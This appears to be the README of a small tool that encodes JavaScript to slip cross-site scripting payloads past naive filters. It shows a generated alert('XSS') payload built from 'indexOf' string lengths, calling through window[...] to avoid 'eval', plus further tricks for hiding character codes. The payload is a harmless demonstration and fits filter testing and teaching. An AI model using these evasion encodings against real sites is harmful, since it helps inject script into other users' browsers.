Playing with JavaScript for fun and XSS evasion.
To generate an alert box containing 'XSS':
python make_s.py alert -p XSS -o out.js
Should generate this:
var f = window[String.fromCharCode('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAundefined'.indexOf())+String.fromCharCode('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAundefined'.indexOf())+String.fromCharCode('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAundefined'.indexOf())+String.fromCharCode('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAundefined'.indexOf())+String.fromCharCode('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAundefined'.indexOf())];
f(String.fromCharCode('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAundefined'.indexOf())+String.fromCharCode('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAundefined'.indexOf())+String.fromCharCode('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAundefined'.indexOf()));
To see what happened:
cat pre out.js post > out.html
Then open out.html with your browser. You should see an alert box.
This is valid JavaScript:
var foo = 'AAAAundefined'.indexOf();
// 'foo' is now 4
var chr = String.fromCharCode(97 + foo);
// 'chr' is now 'e'
So one could encode a string like 'alert("XSS")' using any character repeated N times (with N the ASCII value of the character) followed by the string 'undefined'.
However, writing 'alert' is not enough; we'd like to execute it. To do so without an explicit call to 'eval':
var f = window['alert'];
var g = 'the parameter';
// will alert 'the parameter'
f(g);
We're trying to evade filters here and the assumption is a naive filter
that searches for occurrence of 'eval'. There are other ways to execute
code (e.g. new Function(), setTimeout etc.) and this is just an
example.
Ultimately:
1. Take a payload e.g. 'alert("XSS")'
2. Encode the function call 'alert' and the parameter '"XSS"' using the 'indexOf' trick
3. Execute the function using the 'window' trick
When generating the payload, to avoid the call to 'fromCharCode' use this (only for letters, as 36 here is a base):
(11).toString(36); = 'b'
Also to avoid the 'undefined' string, use an empty function:
function f() {}
var foo = 'AAAA' + f();
var foo2 = foo.indexOf()
For the inspiration this post by Neil Fraser. For implementation, this SO answer and this post.